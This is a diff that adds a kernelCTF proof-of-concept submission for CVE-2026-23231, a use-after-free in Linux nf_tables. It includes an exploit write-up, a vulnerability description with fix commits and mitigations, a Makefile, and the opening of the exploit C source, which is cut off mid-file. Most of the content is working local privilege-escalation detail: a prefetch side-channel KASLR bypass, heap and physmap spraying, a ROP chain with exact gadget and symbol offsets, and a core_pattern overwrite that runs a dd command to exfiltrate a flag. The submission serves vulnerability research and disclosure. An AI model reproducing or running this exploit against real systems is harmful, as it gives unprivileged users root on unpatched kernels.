diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/exploit.md new file mode 100644 index 000000000..dce11d8d0 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/exploit.md @@ -0,0 +1,214 @@ +# Exploit: cos-113-18244.521.88 + +## Overview + +Local privilege escalation exploit targeting Linux 6.1.155+ (COS-113, PREEMPT_NONE, KVM, 2 CPUs, 3.5 GB RAM). The exploit leverages a packet-path use-after-free in nf_tables `nf_tables_addchain()` to hijack RIP via a fake rule blob, overwrite `core_pattern`, and exfiltrate the flag from `/dev/vdb` via `call_usermodehelper`. + +This exploit targets the packet-path manifestation of CVE-2026-23231. The CVE also covers a control-plane UAF reachable from `nf_tables_dump_chains()`, but the privilege-escalation path here relies on the transient IPv4 hook installed during `NFPROTO_INET` rollback. + +For the public PR, the `exploit` target builds the kernelXDK port in `exploit_xdk.cpp`. The 0-day submission archive of the original non-XDK exploit is carried separately as `original.tar.gz`. + +**Stability**: Probabilistic race. Local QEMU testing showed the internal prefetch-only path was not stable enough for repro, so the submitted metadata uses the kernelCTF separate KASLR leak path (`requires_separate_kaslr_leak=true`). In the repro harness this appends `nokaslr -- kaslr_leak=1`; the init script passes the kernel text base from `/proc/kallsyms` as argv when available. If kallsyms is hidden and the argv value is zero, the exploit uses its `nokaslr` fallback and derives the fixed direct-map base locally. + +**KASLR handling**: In submitted repro mode, `nokaslr` fixes `kbase` at `0xffffffff81000000` and `phbase` at `0xffff888000000000`. The exploit accepts the kernelCTF argv kbase, optional `KBASE`/`PHYSBASE` environment overrides, and a `nokaslr` fallback for local repro. The standalone prefetch side-channel leak path remains implemented for non-repro use. + +--- + +## Step-by-step Exploitation + +### Step 1: KASLR Bypass via Prefetch Side Channel + + + +Outside the kernelCTF separate-leak repro path, the exploit leaks the kernel text base (`kbase`) and direct-map base (`phbase`) using a prefetch side channel. It times `prefetchnta` and `prefetcht2` with `rdtscp`. + +- **Intel kbase scan**: Scans `entry_SYSCALL_64` (`kbase + 0x1400080`) with 16 MB KASLR steps. Each vote primes the syscall path, records the lowest prefetch timing over 16 samples per candidate, then majority-votes 7 scans. + +- **Intel phbase scan**: Scans the direct map from `0xffff888000000000` to `0xffffc88000000000` using lowest-timing votes with a 1 GB coarse step, then refines around the first hit with a 64 MB step. + +- **Fallback scan**: On non-Intel hosts, scans mapped ranges by treating averaged timings above the calibrated threshold as mapped kernel addresses. The threshold is capped at 190 cycles by default and 130 cycles on Xeon hosts, then adjusted down to the measured unmapped baseline plus a 24-cycle margin when the host timing is lower. + +- **Vulnerability verification**: The verifier invokes the exploit with `--vuln-trigger` on a KASAN `nokaslr` kernel. In that mode the exploit skips the LPE payload, KASLR leak, physmap spray, reclaim thread, and candidate schedule. It saturates IPv6 hooks, floods IPv4 LOCAL_OUT, and runs the same INET rollback race so vulnerable kernels report the packet-path `nft_do_chain()` UAF before patched kernels' added RCU grace period can be bypassed. Patched kernels should finish without a KASAN report. + +- **Candidate arrays**: The repro path uses the verified primary `kbase`. When pagemap is unavailable, it ranks freed `__init` aliases by prefetch timing and tries 26 candidates with a fresh user/net namespace for each candidate. Direct-map guesses remain as a later fallback. + +**Objects**: None (pure side-channel, no kernel objects involved). + +### Step 2: Physmap Spray with ROP Blob + + + +A 2.5 GB region is allocated via `mmap(MAP_SHARED | MAP_ANONYMOUS | MAP_POPULATE)` so parent-side refills remain visible to forked race workers. Every 4 KB page is filled with: + +- **Bytes 0x000-0x097**: A fake `nft_rule_blob` containing a ROP chain (4 fake `nft_immediate_eval` expressions). See [ROP Chain Details](#rop-chain-details) below. +- **Byte 0x100** (`PATH_OFFSET`): The payload string `|/bin/dd if=/dev/vdb of=/dev/ttyS0` (for `core_pattern` overwrite). + +The direct-map base (`phbase`) provides a 1:1 virtual mapping of physical RAM, so these user pages are accessible from the kernel at predictable KVAs (`phbase + pfn * 0x1000` when pagemap is readable). When pagemap is blocked in repro, the exploit first uses the freed `__init_begin..__init_end` linear aliases as stable kernel mappings for sprayed pages. + +If `/proc/self/pagemap` is readable, the exact physical frame number is read to compute the precise KVA. Otherwise, the exploit ranks `__init` page aliases by prefetch timing, tries each candidate for 20 seconds in a fresh child, and keeps the parent polling for late `core_pattern` hits. If that fails, it falls back to direct-map offsets in the `[0.5, 2.5] GB` range from `phbase` (avoiding the QEMU MMIO hole at 3-4 GB physical). + +**Objects**: Physical pages via physmap (direct map). +**Cache**: N/A (physmap pages, not slab objects). + +### Step 3: Namespace Setup + + + +The exploit creates user and network namespaces (`unshare(CLONE_NEWUSER | CLONE_NEWNET)`) to gain `CAP_NET_ADMIN` for nf_tables access. UID/GID mappings are written to `/proc/self/uid_map` and `/proc/self/gid_map`. The loopback interface is brought up (required for UDP flood packets to traverse LOCAL_OUT hooks). + +### Step 4: Saturate IPv6 LOCAL_OUT Hooks + + + +An IPv6 nf_tables table (`t6`) is created, then up to 1024 base chains are added on the `NF_INET_LOCAL_OUT` hookpoint. Once `MAX_HOOK_COUNT` (1024) is reached, any subsequent hook registration for IPv6 LOCAL_OUT returns `-E2BIG`. + +This sets up the precondition for triggering the vulnerability: when creating an `NFPROTO_INET` chain, the IPv4 hook succeeds but the IPv6 hook fails with `-E2BIG`. + +An INET table (`ti`) is also created for the race loop. + +**Syscalls**: `sendto()` on `AF_NETLINK` / `NETLINK_NETFILTER` socket (nfnetlink batch messages with `NFT_MSG_NEWTABLE` and `NFT_MSG_NEWCHAIN`). + +### Step 5: Race -- Trigger UAF and Reclaim with msg_msg + + + +Three threads run concurrently on 2 CPUs: + +#### Thread 1: UDP Flood (CPU 1) + +Sends UDP packets to `127.0.0.1:12345` via `sendmmsg()` in batches of 128. Each packet traverses `NF_INET_LOCAL_OUT`, calling `nft_do_chain_inet()` -> `nft_do_chain()` on any registered IPv4 hook. Yields every 8th batch (`sched_yield()`) to report RCU quiescent states, ensuring `synchronize_rcu()` on CPU 0 completes quickly on a PREEMPT_NONE kernel. + +**Purpose**: Provide a continuous stream of packets that hit the transiently-installed IPv4 hook during the race window. + +#### Thread 2: INET NEWCHAIN Loop (CPU 0) + +Sends nfnetlink batch messages creating `NFPROTO_INET` base chains. Each attempt: + +1. Chain is allocated (`nft_base_chain`, kmalloc-256) and published to `table->chains` via `list_add_tail_rcu()`. +2. IPv4 hook registers successfully -- packets can now reach `nft_do_chain()` on this chain. +3. IPv6 hook registration fails with `-E2BIG` (hooks saturated). +4. Error path: `nft_chain_del()` removes chain from list, then `nf_tables_chain_destroy()` frees the `nft_base_chain` and its rule blob **without `synchronize_rcu()`**. +5. The nfnetlink batch abort path calls `synchronize_rcu()` unconditionally in `__nf_tables_abort()`, which **blocks** this thread -- allowing the spray thread to run. + +**Vulnerable window**: ~2 us between IPv4 hook going live and chain free. On KVM, VMEXITs (5-20 us each) can delay a packet's `nft_do_chain()` blob read past the kfree point. + +**Vulnerable object**: `struct nft_base_chain` (kmalloc-cg-256). +**Vulnerable field**: `chain.blob_gen_0` / `chain.blob_gen_1` (pointers to rule blob, read by `nft_do_chain()` after free). + +#### Thread 3: Dedicated msg_msg Spray (CPU 0) + +Runs on the **same CPU** as the race thread. When the race thread blocks in `synchronize_rcu()`, the scheduler switches to this thread. It performs: + +1. Burst of 8 `msgsnd()` calls across 512 queues: allocates `msg_msg` objects from CPU 0's `kmalloc-cg-256` per-CPU SLUB freelist. The **first** `msgsnd` after the chain free should pick up the just-freed `nft_base_chain` slot (SLUB LIFO order), while the remaining burst covers scheduler jitter before RCU quiescence. +2. `sched_yield()`: forces context switch -> `rcu_note_context_switch()` -> quiescent state for CPU 0, unblocking the pending `synchronize_rcu()`. + +**Reclaim object**: `struct msg_msg` (kmalloc-cg-256, 256-byte allocation: 48-byte msg_msg header + 208-byte mtext). +**Overwritten fields in reclaimed nft_base_chain**: +| Allocation Offset | Field | Value | mtext Offset | +|---|---|---|---| +| +64 | `basechain.policy` | `1` (NF_ACCEPT) | mtext[16] | +| +80 | `chain.blob_gen_0` | physmap KVA (points to ROP blob page) | mtext[32] | +| +88 | `chain.blob_gen_1` | physmap KVA (same) | mtext[40] | +| +164 | `chain.flags` | `0x01` (NFT_CHAIN_BASE) | mtext[116] | + +When a racing packet on CPU 1 calls `nft_do_chain()` on the freed-and-reclaimed chain, it reads `blob_gen_X` which now points to our physmap ROP blob page. + +#### Synchronization + +- **Race thread <-> Spray thread**: Implicit via `synchronize_rcu()` blocking. When the race thread blocks, the OS scheduler switches to the spray thread on the same CPU. No explicit synchronization primitives. +- **Flood thread <-> Race thread**: The flood thread's `sched_yield()` every 8th batch provides RCU quiescent states on CPU 1 while keeping packet pressure on the transient IPv4 hook. +- **Termination**: Shared `volatile int race_running` and `race_won` flags. The parent process polls `core_pattern` every 2 seconds. + +### Step 6: ROP Chain Execution via nft_immediate_eval + + + +When the racing packet dereferences the reclaimed `blob_gen_X` pointer, it reaches our physmap page containing a fake `nft_rule_blob`. The blob is structured as: + +``` ++0x000: blob_size = 0x90 (144 bytes) ++0x008: rule_descriptor_0: dlen=128 (4 expressions x 32 bytes), is_last=0 ++0x010: expression 0 (32 bytes) ++0x030: expression 1 (32 bytes) ++0x050: expression 2 (32 bytes) ++0x070: expression 3 (32 bytes) ++0x090: rule_descriptor_1: is_last=1 (end marker) +``` + +Each expression has `ops` set to `nft_immediate_ops` (`kbase + 0x1d433e0`). The `nft_immediate_eval()` function copies `expr->data` into `regs->data[dreg]`. By targeting the `dreg` corresponding to `nft_do_chain()`'s return address on the stack, we hijack RIP. + +#### ROP Chain Details + +The ROP chain is written into `nft_do_chain()`'s stack frame via the `dreg` mechanism: + +| Expr | dreg | Stack Offset | Gadget / Value | Purpose | +|------|------|-------------|----------------|---------| +| 0 | 130 (ret addr) | rsp+0x250 | `pop rsi; pop rdi; ret` (`kbase + 0xafc2d1`) | Load args for strcpy | +| 0 | (data) | | `rsi` = physmap page + 0x100 (path string), value popped by gadget | Source string | +| 1 | 134 (ret+16) | rsp+0x260 | `rdi` = `kbase + 0x2bb9ec0` (`core_pattern`), then `strcpy` (`kbase + 0x12b59f0`) | Overwrite core_pattern | +| 2 | 138 (ret+32) | rsp+0x270 | `pop rdi; ret` (`kbase + 0x195d8c`), `rdi` = 0x7FFFFFFF | Load msleep argument | +| 3 | 142 (ret+48) | rsp+0x280 | `msleep` (`kbase + 0x243850`), `return_thunk` (`kbase + 0x16054b0`) | Sleep ~25 days (keeps system alive) | + +**Constant explanations**: +- `DREG_RET = 130`: `(0x250 - 0x48) / 4`. `nft_do_chain()` has `sub $0x220, %rsp` + 6 pushes (48 bytes). `regs` is at `rsp+0x48`, return address at `rsp+0x250`. Register file is `uint32_t regs.data[]`, so offset `(0x250 - 0x48) / 4 = 130`. +- `PATH_OFFSET = 0x100`: Offset within each physmap page where the payload string is stored, chosen to be past the 0x98-byte blob. + +#### Kernel Symbol Offsets (cos-113-18244.521.88 vmlinux) + +| Define | Offset | Symbol | +|--------|--------|--------| +| `OFF_CORE_PATTERN` | `0x2bb9ec0` | `core_pattern` (global variable) | +| `OFF_MODPROBE` | `0x2a76a20` | `modprobe_path` (unused, fallback) | +| `OFF_NFT_IMM_OPS` | `0x1d433e0` | `nft_immediate_ops` (expression ops vtable) | +| `OFF_POP_RSI_RDI` | `0xafc2d1` | `pop rsi; pop rdi; ret` gadget | +| `OFF_POP_RDI` | `0x195d8c` | `pop rdi; ret` gadget | +| `OFF_STRCPY` | `0x12b59f0` | `strcpy` | +| `OFF_MSLEEP` | `0x243850` | `msleep` | +| `OFF_RETURN_THUNK` | `0x16054b0` | `__x86_return_thunk` | + +### Step 7: core_pattern Overwrite and Flag Exfiltration + + + +After the ROP chain executes `strcpy(core_pattern, "|/bin/dd if=/dev/vdb of=/dev/ttyS0")`, the `msleep(0x7FFFFFFF)` keeps the system alive (BUGs with "scheduling while atomic" but `schedule()` still executes, keeping the system up for ~120 seconds until `hung_task` watchdog panics). + +The parent process (forked before entering the exploit child) polls `/proc/sys/kernel/core_pattern` every 2 seconds. Once it detects the overwrite: + +1. Sets `RLIMIT_CORE` to unlimited. +2. Sets `PR_SET_DUMPABLE` to 1. +3. Forks a child that calls `raise(SIGSEGV)`. +4. The kernel's core dump handler invokes `call_usermodehelper` with the pipe command from `core_pattern`. +5. `/bin/dd if=/dev/vdb of=/dev/ttyS0` copies the flag from the virtio block device to the serial console. +6. The kctf infrastructure captures the flag from serial output. + +**Why `core_pattern` instead of `modprobe_path`**: Inside kctf's nsjail container, `modprobe_path` resolution happens in the init mount namespace. The exploit process's memfd (`/proc/PID/fd/N`) is not visible from the init PID namespace (different PID ns), and `/tmp/pw` is on a separate tmpfs. `core_pattern` with `|/bin/dd` uses only init-namespace-visible paths (`/bin/dd` on rootfs, `/dev/vdb` and `/dev/ttyS0` on devtmpfs). + +**Why `msleep()` instead of `do_exit()`**: `do_exit()` from softirq context kills the current task and closes all file descriptors (including memfd FDs). `msleep()` BUGs with "scheduling while atomic" but `schedule()` still executes, keeping the system alive long enough for the parent to detect the overwrite and trigger core dumps. + +--- + +## Environmental Requirements + +- **CPU affinity**: The race thread and spray thread are pinned to CPU 0; the flood thread is pinned to CPU 1. This is critical because: + - SLUB uses per-CPU freelists. The spray thread must run on the same CPU as the race thread to pick up the freed `nft_base_chain` slot (LIFO order). + - The flood thread on a separate CPU ensures packets traverse the hook path concurrently with chain allocation/free. + +- **Namespaces**: User namespace + network namespace are required to gain `CAP_NET_ADMIN` for nf_tables access. The exploit calls `unshare(CLONE_NEWUSER)` then `unshare(CLONE_NEWNET)`. + +- **Memory**: The exploit uses 2.5 GB for physmap spray (auto-capped to 75% of available RAM on smaller systems). The kctf VM has 3.5 GB RAM. + +- **SMAP detection**: If SMAP is not present (e.g., TCG mode), the exploit uses a userspace page as the fake blob instead of physmap spray, eliminating the need for phbase scanning entirely. + +## Separation of Concerns + +| Code Section | Purpose | +|---|---| +| `do_entrybleed()` / `leak_entrybleed()`, `leak_kernel_text_prefetch()`, `leak_direct_mapping_prefetch()` | KASLR bypass (information leak) | +| `setup_ns()` | Environment setup (namespace creation) | +| `saturate_ipv6_hooks()` | Vulnerability setup (creating precondition for -E2BIG failure) | +| `vuln_trigger_main()` | KASAN verifier path for reachability only | +| `inet_race_thread()` | Vulnerability trigger (INET NEWCHAIN creating the UAF) | +| `udp_flood_thread()` | Exploitation support (providing racing packets) | +| `dedicated_spray_thread()`, `spray_msgs()`, `build_spray_msg()` | Heap spraying (msg_msg reclaim of freed nft_base_chain) | +| `physmap_spray()`, `physmap_fill_rop()`, `build_blob()` | ROP payload construction | +| `try_core_dump()`, `try_modprobe()` | Post-exploitation (flag exfiltration) | diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/vulnerability.md new file mode 100644 index 000000000..8d812b737 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/docs/vulnerability.md @@ -0,0 +1,68 @@ +# Vulnerability: Use-After-Free in nf_tables_addchain() Error Path (CVE-2026-23231) + +## Summary + +A use-after-free vulnerability exists in the netfilter `nf_tables` subsystem, specifically in the error path of `nf_tables_addchain()`. If hook registration fails after the chain has been published, the error path calls `nft_chain_del()` and then immediately calls `nf_tables_chain_destroy()` without an intervening `synchronize_rcu()`. + +This violates the RCU publish/grace-period/free contract and creates two separate UAF conditions covered by CVE-2026-23231: + +- **Control-plane UAF**: `nf_tables_dump_chains()` traverses `table->chains` under `rcu_read_lock()`, so a concurrent dump can still walk the chain after it has been removed with `list_del_rcu()` but before readers quiesce. +- **Packet-path UAF**: for `NFPROTO_INET`, `nf_register_net_hook()` can briefly install the IPv4 hook before IPv6 registration fails. Packets entering `nft_do_chain()` through that transient IPv4 hook can still dereference `chain->blob_gen_X` after the chain has been freed. + +The exploit in this submission uses the second condition: partial `NFPROTO_INET` hook registration failure caused by exhausting IPv6 `LOCAL_OUT` hooks. + +## Affected Component + +- **Subsystem**: netfilter / nf_tables +- **Source file**: `net/netfilter/nf_tables_api.c` +- **Function**: `nf_tables_addchain()` + +## Vulnerability Type + +- **Cause**: Use-After-Free (UAF) due to missing RCU grace period +- **Root cause**: `nf_tables_addchain()` frees the chain immediately after `list_del_rcu()` on the hook-registration failure path, allowing concurrent RCU readers to observe freed memory + +## Requirements to Trigger + +- **User namespaces**: Not required for the bug in general, but required for this exploit so an unprivileged user can create a network namespace and gain `CAP_NET_ADMIN` inside it. +- **Capabilities**: `CAP_NET_ADMIN` (inside the attacker's network namespace for this exploit) +- **Kernel configuration**: `CONFIG_NF_TABLES`, `CONFIG_NF_TABLES_INET` +- **Other**: Ability to saturate IPv6 hooks to `MAX_HOOK_COUNT` (1024) to force the IPv6 hook registration failure + +## Commit Which Introduced the Vulnerability + +- **Commit**: [`91c7b38dc9f0`](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=91c7b38dc9f0de4f7f444b796d14476bc12df7bc) ("netfilter: nf_tables: use new transaction infrastructure to handle chain") +- This commit introduced the transaction-based chain handling and the vulnerable teardown path that removes a chain with `list_del_rcu()` and then frees it without waiting for an RCU grace period when hook registration fails. + +## Commit Which Fixed the Vulnerability + +- **Fix**: Add `synchronize_rcu()` between `nft_chain_del()` and `nf_tables_chain_destroy()` in the `err_register_hook` error path of `nf_tables_addchain()`. +- **Patch commit**: [`71e99ee20fc3`](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=71e99ee20fc3f662555118cf1159443250647533) ("netfilter: nf_tables: fix use-after-free in nf_tables_addchain()") + +## Affected Kernel Versions + +- **Introduced in**: 3.16 (when `91c7b38dc9f0` first shipped) +- **Affected stable ranges**: 3.16 - 6.1.164, 6.2 - 6.6.127, 6.7 - 6.12.74, 6.13 - 6.18.13, and 6.19 - 6.19.3 +- **Fixed in**: 6.1.165, 6.6.128, 6.12.75, 6.18.14, 6.19.4, and mainline 7.0-rc1 + +## Blocking the Vulnerability + +The vulnerability can be prevented by any of the following: + +- **Disabling user namespaces** (`kernel.unprivileged_userns_clone=0` or equivalent) prevents this exploit path from obtaining `CAP_NET_ADMIN` in a private network namespace. +- **Blocking `NETLINK_NETFILTER` socket creation** from unprivileged contexts. +- **Disabling nf_tables support** (`CONFIG_NF_TABLES=n`) or, more narrowly, disabling INET chains (`CONFIG_NF_TABLES_INET=n`). +- **Limiting `nf_tables` access** via security modules (e.g., SELinux, AppArmor policies denying netfilter configuration). + +## KASAN Report + +``` +BUG: KASAN: use-after-free in nft_do_chain+0x1214/0x12a0 +Read of size 8 at addr ffff888103ef0b00 by task init/76 +... +Allocated by task 77: + nf_tables_addchain.constprop.0+0x8f9/0x1f80 +Freed by task 77: + nf_tables_chain_destroy+0xb8/0x530 + nf_tables_addchain.constprop.0+0xe6f/0x1f80 +``` diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/Makefile b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/Makefile new file mode 100644 index 000000000..9ae3f525b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/Makefile @@ -0,0 +1,45 @@ +# kernelCTF exploit build for cos-113-18244.521.88 +# +# Default target builds the kernelXDK-integrated version (exploit_xdk.cpp). +# Use 'make exploit_original' for the original C version (exploit.c). + +KERNELXDK_INCLUDE_DIR ?= +KERNELXDK_LIB_DIR ?= + +CXX ?= g++ +CC ?= gcc +CXXFLAGS := -g -std=c++20 -I. -static -O2 -Wall -pthread +CFLAGS := -g -static -O2 -Wall -pthread + +ifneq ($(strip $(KERNELXDK_INCLUDE_DIR)),) +CXXFLAGS += -I$(KERNELXDK_INCLUDE_DIR) +endif + +LDFLAGS := -lkernelXDK -pthread +ifneq ($(strip $(KERNELXDK_LIB_DIR)),) +LDFLAGS := -L$(KERNELXDK_LIB_DIR) $(LDFLAGS) +endif + +.PHONY: all prerequisites run clean + +all: exploit + +prerequisites: target_db.kxdb + +# Download kernelXDK target database if not present +target_db.kxdb: + wget -q -O $@ https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +# kernelXDK-integrated version (C++) +exploit: exploit_xdk.cpp target_db.kxdb + $(CXX) $(CXXFLAGS) -o $@ $< $(LDFLAGS) + +# Original C version (does not require kernelXDK) +exploit_original: exploit.c + $(CC) $(CFLAGS) -o $@ $< + +run: exploit + ./exploit + +clean: + rm -f exploit exploit_original target_db.kxdb diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit new file mode 100755 index 000000000..d5b1cecda Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit.c b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit.c new file mode 100644 index 000000000..194457976 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23231_cos/exploit/cos-113-18244.521.88/exploit.c @@ -0,0 +1,2503 @@ +/* + * LPE exploit for cos-113-18244.521.88 (Linux 6.1.155) + * + * Vulnerability: packet-path UAF in nftables via NFPROTO_INET partial hook + * install (vuln.md). IPv4 hook registration succeeds, IPv6 + * fails with -E2BIG -> rollback frees chain/blob immediately + * while a racing packet still dereferences priv->chain in + * nft_do_chain(). + * + * Exploitation: + * 1. Prefetch side-channel KASLR bypass. + * 2. Physmap spray with fake rule blob (ROP via nft_immediate_eval). + * 3. Saturate IPv6 LOCAL_OUT hooks to MAX_HOOK_COUNT (1024). + * 4. Race: UDP flood + INET basechain create/destroy loop + msg_msg spray + * to reclaim freed nft_base_chain (kmalloc-256) with blob_gen_X -> + * physmap page. + * 5. ROP: strcpy(core_pattern, "|/bin/dd ...") -> msleep(~forever). + * 6. Trigger core dump -> flag on serial console. + * + * Race design (no padding hooks): + * Without padding hooks, there's a ~2us window between IPv4 hook going + * live and WRITE_ONCE(accept_all). Packets entering in this window call + * nft_do_chain_inet -> nft_do_chain which reads blob_gen_X. On KVM, + * VMEXITs (5-20us each) can delay the blob_gen_X read past the kfree + + * reclaim point, making exploitation probabilistic but feasible. + * + * A dedicated spray thread on CPU 0 continuously does msgsnd+sched_yield. + * When the race thread blocks in synchronize_rcu (abort path), the + * scheduler switches to the spray thread, which picks up the just-kfree'd + * basechain slot from CPU 0's SLUB freelist (LIFO). + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* ---------- protocol constants ---------- */ +#ifndef NFPROTO_UNSPEC +#define NFPROTO_UNSPEC 0 +#endif +#ifndef NFPROTO_INET +#define NFPROTO_INET 1 +#endif +#ifndef NFPROTO_IPV4 +#define NFPROTO_IPV4 2 +#endif +#ifndef NFPROTO_IPV6 +#define NFPROTO_IPV6 10 +#endif +#ifndef NF_INET_LOCAL_OUT +#define NF_INET_LOCAL_OUT 3 +#endif + +/* ---------- cos-113-18244.521.88 vmlinux offsets ---------- */ +#define OFF_MODPROBE 0x2a76a20ULL +#define OFF_CORE_PATTERN 0x2bb9ec0ULL +#define OFF_PAGE_OFFSET 0x21ac9a0ULL +#define OFF_NFT_IMM_OPS 0x1d433e0ULL +#define OFF_ENTRY_SYSCALL_64 0x1400080ULL +#define OFF_INIT_BEGIN 0x345c000ULL +#define OFF_INIT_END 0x36de000ULL +/* 0xffffffff81afc2d1: pop rsi ; pop rdi ; jmp __x86_return_thunk */ +#define OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK 0xafc2d1ULL +/* 0xffffffff81195d8c: pop rdi ; jmp __x86_return_thunk */ +#define OFF_POP_RDI_JMP_RETURN_THUNK 0x195d8cULL +#define OFF_STRCPY 0x12b59f0ULL +#define OFF_MSLEEP 0x243850ULL +#define OFF_RETURN_THUNK 0x16054b0ULL + +#define DROP_UID 1000 +#define DROP_GID 1000 + +/* MFD_EXEC was added in kernel 6.3; may be backported to 6.1 stable */ +#ifndef MFD_EXEC +#define MFD_EXEC 0x0010U +#endif + +/* + * nft_do_chain stack frame (6.1.155): + * sub $0x220, %rsp; 6 pushes = 48 bytes + * regs at rsp+0x48 + * canary at rsp+0x218 + * return address at rsp+0x250 + * dreg for ret addr = (0x250 - 0x48) / 4 = 130 + */ +#define DREG_RET 130 +#define DREG_RET4 134 +#define DREG_RET8 138 +#define DREG_RET12 142 + +/* + * nft_base_chain layout (cos-113, verified from vmlinux disasm): + * offsetof(nft_base_chain, chain) = 0x50 = 80 + * sizeof(nft_base_chain) ~= 216 -> kmalloc-256 + * + * Within the 256-byte allocation: + * +80: chain.blob_gen_0 (ptr) + * +88: chain.blob_gen_1 (ptr) + * +164: chain.flags byte (need bit 0 set = NFT_CHAIN_BASE) + * +64: basechain.policy (u8, need NF_ACCEPT = 1) + * + * msg_msg header is 48 bytes, so mtext offsets: + * mtext[16] = policy (alloc offset 64) + * mtext[32] = blob_gen_0 (alloc offset 80) + * mtext[40] = blob_gen_1 (alloc offset 88) + * mtext[116] = flags (alloc offset 164) + */ +#define BASECHAIN_CHAIN_OFF 80 +#define ALLOC_BLOB_GEN0 80 +#define ALLOC_BLOB_GEN1 88 +#define ALLOC_POLICY 64 +#define ALLOC_FLAGS 164 +#define MSG_HDR_SZ 48 +#define MTEXT_SZ 208 /* 256 - 48 */ + +/* ---------- tuning ---------- */ +#define IPV6_SATURATE_MAX 1100 +#define NUM_SPRAY_QS 256 +#define MSGS_PER_Q 4 +#define RACE_DURATION_SEC 30 +#define PHYSMAP_MB 2560 +#define INIT_ALIAS_CANDS 26 +#define INIT_ALIAS_SEC 20 +#define INIT_TIMING_PROBES 8 +#define WORKER_GRACE_SEC 6 +#define FLOOD_YIELD_INTERVAL 8 +#define PATH_OFFSET 0x100 +#define MAX_KBASE_CANDS 40 +#define MAX_PHBASE_CANDS 20 +#define KVA_CYCLE_ROUNDS 20 +#define RACE_BATCH_COUNT 1 /* 1 chain per batch */ +#define PAD_HOOKS 0 /* no padding hooks -- they delay packets past accept_all */ +#define USERBLOB_ADDR 0x13370000ULL +#define VULN_TRIGGER_SECONDS 170 +#define VULN_TRIGGER_LOG_EVERY 10 +#define VULN_TRIGGER_FLOODS 4 + +/* ---------- globals ---------- */ +static uint64_t kbase = 0; +static uint64_t phbase = 0; +static int physmap_mb = PHYSMAP_MB; +static uint64_t g_page_kva = 0; +static void *phys_region = NULL; +static volatile int race_running = 0; +static volatile int race_won = 0; +static int use_userblob = 0; /* 1 = SMAP off, use userspace blob */ + +/* namespace-safe payload delivery via memfd */ +static char g_modprobe_path[64] = "/tmp/pw"; +static int g_pw_fd = -1; +static int g_result_fd = -1; + +/* core_pattern approach: overwrite core_pattern instead of modprobe_path. + * |/bin/dd reads /dev/vdb (flag) and writes to /dev/ttyS0 (serial console). + * This works even if /proc is not mounted in the init namespace. + * Trigger: kill a child with SIGSEGV -> core dump -> pipe to dd. */ +static const char g_core_cmd[] = "|/bin/dd if=/dev/vdb of=/dev/ttyS0"; +static int use_core_pattern = 1; /* default: use core_pattern approach */ + +#ifndef SYS_memfd_create +#define SYS_memfd_create 319 +#endif + +/* ---------- helpers ---------- */ +static void die(const char *m) { perror(m); _exit(1); } +static void sleep_ms(int ms) { + struct timespec ts = { ms / 1000, (ms % 1000) * 1000000L }; + nanosleep(&ts, NULL); +} +static uint64_t env_u64(const char *name) { + const char *v = getenv(name); + return v ? strtoull(v, NULL, 0) : 0; +} +static bool parse_u64_arg(const char *s, uint64_t *out) { + if (!s || !*s || !out) return false; + + errno = 0; + char *end = NULL; + unsigned long long v = strtoull(s, &end, 0); + if (errno == 0 && end != s && *end == '\0') { + *out = (uint64_t)v; + return true; + } + + errno = 0; + end = NULL; + v = strtoull(s, &end, 16); + if (errno == 0 && end != s && *end == '\0') { + *out = (uint64_t)v; + return true; + } + return false; +} +static bool kernel_cmdline_has_token(const char *token) { + if (!token || !*token) return false; + + char buf[4096] = {0}; + int fd = open("/proc/cmdline", O_RDONLY | O_CLOEXEC); + if (fd < 0) return false; + ssize_t n = read(fd, buf, sizeof(buf) - 1); + close(fd); + if (n <= 0) return false; + buf[n] = '\0'; + + size_t token_len = strlen(token); + for (char *p = buf; *p;) { + while (*p == ' ' || *p == '\n' || *p == '\t') p++; + if (!*p) break; + char *q = p; + while (*q && *q != ' ' && *q != '\n' && *q != '\t') q++; + if ((size_t)(q - p) == token_len && + memcmp(p, token, token_len) == 0) + return true; + p = q; + } + return false; +} +static void cpu_pin(int cpu) { + cpu_set_t s; + CPU_ZERO(&s); + CPU_SET(cpu, &s); + sched_setaffinity(0, sizeof(s), &s); +} + +/* + * Check if SMAP is enabled by examining /proc/cpuinfo flags. + * Returns 1 if SMAP is present (kernel can't read userspace), + * 0 if absent (userspace blob approach works). + */ +static int check_smap(void) { + FILE *f = fopen("/proc/cpuinfo", "r"); + if (!f) return 1; /* assume present */ + char line[4096]; + while (fgets(line, sizeof(line), f)) { + if (strncmp(line, "flags", 5) == 0) { + fclose(f); + if (strstr(line, " smap")) + return 1; + return 0; + } + } + fclose(f); + return 1; /* no flags line -> assume present */ +} + +/* ================================================================ + * KASLR bypass: prefetch side channel + * ================================================================ */ +#define PREFETCH_SCAN_TRIES (64 * 1024) +#define PREFETCH_CONFIRM_TRIES (128 * 1024) +#define PREFETCH_HIST_SIZE 4000 +#define PREFETCH_THRESHOLD_DEFAULT 190 +#define 